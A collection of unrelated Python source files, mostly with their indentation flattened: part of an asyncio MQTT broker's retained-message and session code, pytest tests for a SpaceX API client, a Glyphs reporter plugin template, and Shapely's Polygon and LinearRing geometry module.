            broadcast['qos'] = force_qos
yield from self._broadcast_queue.put(broadcast)
@asyncio.coroutine
def publish_session_retained_messages(self, session):
self.logger.debug("Publishing %d messages retained for session %s" %
(session.retained_messages.qsize(), format_client_message(session=session))
)
publish_tasks = []
handler = self._get_handler(session)
while not session.retained_messages.empty():
retained = yield from session.retained_messages.get()
publish_tasks.append(asyncio.ensure_future(
handler.mqtt_publish(
retained.topic, retained.data, retained.qos, True), loop=self._loop))
if publish_tasks:
yield from asyncio.wait(publish_tasks, loop=self._loop)
@asyncio.coroutine
def publish_retained_messages_for_subscription(self, subscription, session):
self.logger.debug("Begin broadcasting messages retained due to subscription on '%s' from %s" %
(subscription[0], format_client_message(session=session)))
publish_tasks = []
handler = self._get_handler(session)
for d_topic in self._retained_messages:
self.logger.debug("matching : %s %s" % (d_topic, subscription[0]))
if self.matches(d_topic, subscription[0]):
self.logger.debug("%s and %s match" % (d_topic, subscription[0]))
retained = self._retained_messages[d_topic]
publish_tasks.append(asyncio.Task(
handler.mqtt_publish(
retained.topic, retained.data, subscription[1], True), loop=self._loop))
if publish_tasks:
yield from asyncio.wait(publish_tasks, loop=self._loop)
self.logger.debug("End broadcasting messages retained due to subscription on '%s' from %s" %
(subscription[0], format_client_message(session=session)))
def delete_session(self, client_id):
"""
Delete an existing session data, for example due to clean session set in CONNECT
:param client_id:
:return:
"""
try:
session = self._sessions[client_id][0]
except KeyError:
session = None
if session is None:
self.logger.debug("Delete session : session %s doesn't exist" % client_id)
return
# Delete subscriptions
self.logger.debug("deleting session %s subscriptions" % repr(session))
self._del_all_subscriptions(session)
self.logger.debug("deleting existing session %s" % repr(self._sessions[client_id]))
del self._sessions[client_id]
def _get_handler(self, session):
client_id = session.client_id
if client_id:
try:
return self._sessions[client_id][1]
except KeyError:
pass
return None
|
import sys
sys.path.append('../')
import pytest
import spacexpython
from .tutils import *
def test_api():
api_data = ''
api_result = alphaOrder(readJSONFile('info/api.json'))
try:
api_data = alphaOrder(spacexpython.info.api())
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print ("Failure on info.api")
assert api_result == api_data
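# The tests in this module share one pattern: pytest captures stdout, so the
# "Failure on ..." print only appears in the report when the assertion fails,
# and a network timeout marks the test as an expected failure (pytest.xfail
# raises, so the assert is never reached).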
def test_company():
company_data = ''
company_result = alphaOrder(readJSONFile('info/company.json'))
try:
company_data = alphaOrder(spacexpython.info.company())
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print ("Failure on info.company")
assert company_data == company_result
def test_clients():
client_data = ''
client_result = keyOrder(alphaOrder(
readJSONFile('info/clients.json')), "Name")
try:
client_data = keyOrder(
alphaOrder(spacexpython.info.clients()), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.clients")
assert client_data == client_result
def test_language():
language_data = ''
language_result = keyOrder(alphaOrder(
readJSONFile('info/oneclientmine.json')), "Name")
try:
language_data = keyOrder(alphaOrder(
spacexpython.info.clients(
'{"Languages":["Python"], '
+ ' "Creators":["Andrew Shapton"]}')), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.clients(Language)")
assert language_data == language_result
def test_apps():
apps_data = ''
apps_result = keyOrder(alphaOrder(
readJSONFile('info/apps.json')), "Name")
try:
apps_data = keyOrder(
alphaOrder(spacexpython.info.apps()), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.apps")
print(apps_data)
assert apps_data == apps_result
def test_one_app():
one_app_data = ''
one_app_result = keyOrder(alphaOrder(
readJSONFile('info/oneapsxmw.json')), "Name")
try:
one_app_data = keyOrder(alphaOrder(
spacexpython.info.apps(
'{"Name":["SpaceX Mission Watch"]}')), "Name")
except spacexpython.utils.SpaceXReadTimeOut:
pytest.xfail("Space/X API Read Timed Out")
print("Failure on info.apps(Name)")
assert one_app_data == one_app_result
|
# encoding: utf-8
###########################################################################################################
#
#
# Reporter Plugin
#
# Read the docs:
# https://github.com/schriftgestalt/GlyphsSDK/tree/master/Python%20Templates/Reporter
#
#
###########################################################################################################
from __future__ import division, print_function, unicode_literals
import objc
from GlyphsApp import *
from GlyphsApp.plugins import *
class ____PluginClassName____(ReporterPlugin):
@objc.python_method
def settings(self):
self.menuName = Glyphs.localize({'en': u'My Plugin', 'de': u'Mein Plugin'})
self.generalContextMenus = [
{'name': Glyphs.localize({'en': u'Do something', 'de': u'Tu etwas'}), 'action': self.doSomething},
]
@objc.python_method
def foreground(self, layer):
NSColor.blueColor().set()
NSBezierPath.fillRect_(layer.bounds)
self.drawTextAtPoint(layer.parent.name, NSPoint(0, 0))
@objc.python_method
def inactiveLayer(self, layer):
NSColor.redColor().set()
if layer.paths:
layer.bezierPath.fill()
if layer.components:
for component in layer.components:
component.bezierPath.fill()
@objc.python_method
def preview(self, layer):
NSColor.blueColor().set()
if layer.paths:
layer.bezierPath.fill()
if layer.components:
for component in layer.components:
component.bezierPath.fill()
@objc.python_method
def doSomething(self):
print('Just did something')
@objc.python_method
def conditionalContextMenus(self):
# Empty list of context menu items
contextMenus = []
# Execute only if layers are actually selected
if Glyphs.font.selectedLayers:
layer = Glyphs.font.selectedLayers[0]
# Exactly one object is selected and it’s an anchor
if len(layer.selection) == 1 and type(layer.selection[0]) == GSAnchor:
# Add context menu item
contextMenus.append({'name': Glyphs.localize({'en': u'Do something else', 'de': u'Tu etwas anderes'}), 'action': self.doSomethingElse})
# Return list of context menu items
return contextMenus
@objc.python_method
def doSomethingElse(self):
print('Just did something else')
@objc.python_method
def __file__(self):
"""Please leave this method unchanged"""
return __file__
|
"""Polygons and their linear ring components
"""
import sys
import warnings
from ctypes import c_void_p, cast, POINTER
import weakref
from shapely.algorithms.cga import signed_area
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry, geos_geom_from_py
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.point import Point
from shapely.geometry.proxy import PolygonProxy
from shapely.errors import TopologicalError, ShapelyDeprecationWarning
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
"""
A closed one-dimensional feature comprising one or more line segments
A LinearRing that crosses itself or touches itself at a single point is
invalid and operations on it may fail.
"""
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
        Rings are implicitly closed. There is no need to specify a final
coordinate pair identical to the first.
Example
-------
Construct a square ring.
>>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
ret = geos_linearring_from_py(coordinates)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
# Coordinate access
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
warnings.warn(
"Setting the 'coords' to mutate a Geometry in place is deprecated,"
" and will not be possible any more in Shapely 2.0",
ShapelyDeprecationWarning, stacklevel=2)
self._empty()
ret = geos_linearring_from_py(coordinates)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
coords = property(_get_coords, _set_coords)
def __setstate__(self, state):
"""WKB doesn't differentiate between LineString and LinearRing so we
need to move the coordinate sequence into the correct geometry type"""
super(LinearRing, self).__setstate__(state)
cs = lgeos.GEOSGeom_getCoordSeq(self.__geom__)
cs_clone = lgeos.GEOSCoordSeq_clone(cs)
lgeos.GEOSGeom_destroy(self.__geom__)
self.__geom__ = lgeos.GEOSGeom_createLinearRing(cs_clone)
@property
def is_ccw(self):
"""True is the ring is oriented counter clock-wise"""
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
warnings.warn(
"The proxy geometries (through the 'asShape()', 'asLinearRing()' or "
"'LinearRingAdapter()' constructors) are deprecated and will be "
"removed in Shapely 2.0. Use the 'shape()' function or the "
"standard 'LinearRing()' constructor instead.",
ShapelyDeprecationWarning, stacklevel=3)
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
"""Adapt an object to the LinearRing interface"""
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def __next__(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in range(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
@property
def _longest(self):
        # Return the largest coordinate count among the interior rings
        longest = 0
        for g in iter(self):
            length = len(g.coords)
            if length > longest:
                longest = length
        return longest
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring._set_geom(g)
ring.__p__ = self
ring._other_owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
"""
A two-dimensional figure bounded by a linear ring
A polygon has a non-zero area. It may have one or more negative-space
"holes" which are also bounded by linear rings. If any rings cross each
other, the feature is invalid and operations on it may fail.
Attributes
----------
exterior : LinearRing
The ring which bounds the positive space of the polygon.
interiors : sequence
A sequence of rings which bound all existing holes.
"""
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples.
Also can be a sequence of Point objects.
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
ret = geos_polygon_from_py(shell, holes)
if ret is not None:
geom, n = ret
self._set_geom(geom)
self._ndim = n
else:
self._empty()
@property
def exterior(self):
if self.is_empty:
return LinearRing()
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring._set_geom(g)
ring.__p__ = self
ring._other_owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
def __eq__(self, other):
if not isinstance(other, Polygon):
return False
check_empty = (self.is_empty, other.is_empty)
if all(check_empty):
return True
elif any(check_empty):
return False
my_coords = [
tuple(self.exterior.coords),
[tuple(interior.coords) for interior in self.interiors]
]
other_coords = [
tuple(other.exterior.coords),
[tuple(interior.coords) for interior in other.interiors]
]
return my_coords == other_coords
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
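    # Illustrative sketch of the structural equality defined above; the
    # coordinates are hypothetical:
    #
    #   Polygon([(0, 0), (1, 0), (1, 1)]) == Polygon([(0, 0), (1, 0), (1, 1)])
    #   # -> True (same exterior coordinates, no holes)
    #   Polygon([(0, 0), (1, 0), (1, 1)]) == Polygon([(1, 0), (1, 1), (0, 0)])
    #   # -> False: comparison is coordinate-by-coordinate, not geometric
    #   # equivalence (the equals() predicate covers that case)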
@property
def _ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior._ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
if self.exterior == LinearRing():
coords = []
else:
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)}
def svg(self, scale_factor=1., fill_color=None):
"""Returns SVG path element for the Polygon geometry.
Parameters
==========
scale_factor : float
Multiplication factor for the SVG stroke-width. Default is 1.
fill_color : str, optional
Hex string for fill color. Default is to use "#66cc99" if
geometry is valid, and "#ff3333" if invalid.
"""
if self.is_empty:
return '<g />'
if fill_color is None:
fill_color = "#66cc99" if self.is_valid else "#ff3333"
exterior_coords = [
["{},{}".format(*c) for c in self.exterior.coords]]
interior_coords = [
["{},{}".format(*c) for c in interior.coords]
for interior in self.interiors]
path = " ".join([
"M {} L {} z".format(coords[0], " L ".join(coords[1:]))
for coords in exterior_coords + interior_coords])
return (
'<path fill-rule="evenodd" fill="{2}" stroke="#555555" '
'stroke-width="{0}" opacity="0.6" d="{1}" />'
).format(2. * scale_factor, path, fill_color)
@classmethod
def from_bounds(cls, xmin, ymin, xmax, ymax):
"""Construct a `Polygon()` from spatial bounds."""
return cls([
(xmin, ymin),
(xmin, ymax),
(xmax, ymax),
(xmax, ymin)])
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
warnings.warn(
"The proxy geometries (through the 'asShape()', 'asPolygon()' or "
"'PolygonAdapter()' constructors) are deprecated and will be "
"removed in Shapely 2.0. Use the 'shape()' function or the "
"standard 'Polygon()' constructor instead.",
ShapelyDeprecationWarning, stacklevel=4)
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
# From array protocol
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
# Fall back on list
return len(self.shell[0])
def asPolygon(shell, holes=None):
"""Adapt objects to the Polygon interface"""
return PolygonAdapter(shell, holes)
def orient(polygon, sign=1.0):
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
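# Illustrative sketch of orient(); the square below is hypothetical:
#
#   p = Polygon([(0, 0), (0, 1), (1, 1), (1, 0)])  # clockwise shell
#   q = orient(p, sign=1.0)
#   # q.exterior now runs counter-clockwise (positive signed area); with
#   # sign=-1.0 the exterior would be clockwise and holes counter-clockwise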
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
# If a LinearRing is passed in, clone it and return
# If a valid LineString is passed in, clone the coord seq and return a
# LinearRing.
#
# NB: access to coordinates using the array protocol has been moved
# entirely to the speedups module.
if isinstance(ob, LineString):
if type(ob) == LinearRing:
return geos_geom_from_py(ob)
elif not ob.is_valid:
raise TopologicalError("An input LineString must be valid.")
elif ob.is_closed and len(ob.coords) >= 4:
return geos_geom_from_py(ob, lgeos.GEOSGeom_createLinearRing)
else:
ob = list(ob.coords)
try:
m = len(ob)
except TypeError: # generators
ob = list(ob)
m = len(ob)
if m == 0:
return None
def _coords(o):
if isinstance(o, Point):
return o.coords[0]
else:
return o
n = len(_coords(ob[0]))
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
# Add closing coordinates if not provided
if (
m == 3
or _coords(ob[0])[0] != _coords(ob[-1])[0]
or _coords(ob[0])[1] != _coords(ob[-1])[1]
):
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
if n != update_ndim:
raise ValueError(
"Coordinate dimensions mismatch: target geom has {} dims, "
"update geom has {} dims".format(n, update_ndim))
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in range(m):
coords = _coords(ob[i])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = _coords(ob[0])
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
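# Illustrative sketch of the implicit-closing logic above; the coordinates
# are hypothetical:
#
#   geos_linearring_from_py([(0, 0), (1, 0), (1, 1)])
#   # m == 3, so M becomes 4 and the first coordinate is appended as the
#   # closing point, yielding the ring (0, 0)-(1, 0)-(1, 1)-(0, 0)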
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is None:
return None
if isinstance(shell, Polygon):
return geos_geom_from_py(shell)
if shell is not None:
ret = geos_linearring_from_py(shell)
if ret is None:
return None
geos_shell, ndim = ret
if holes is not None and len(holes) > 0:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
        if L < 1:
            raise ValueError("number of holes must be non-zero")
        if N not in (2, 3):
            raise ValueError("insufficient coordinate dimension")
# Array of pointers to ring geometries
geos_holes = (c_void_p * L)()
# add to coordinate sequence
for l in range(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell), geos_holes, L), ndim)
|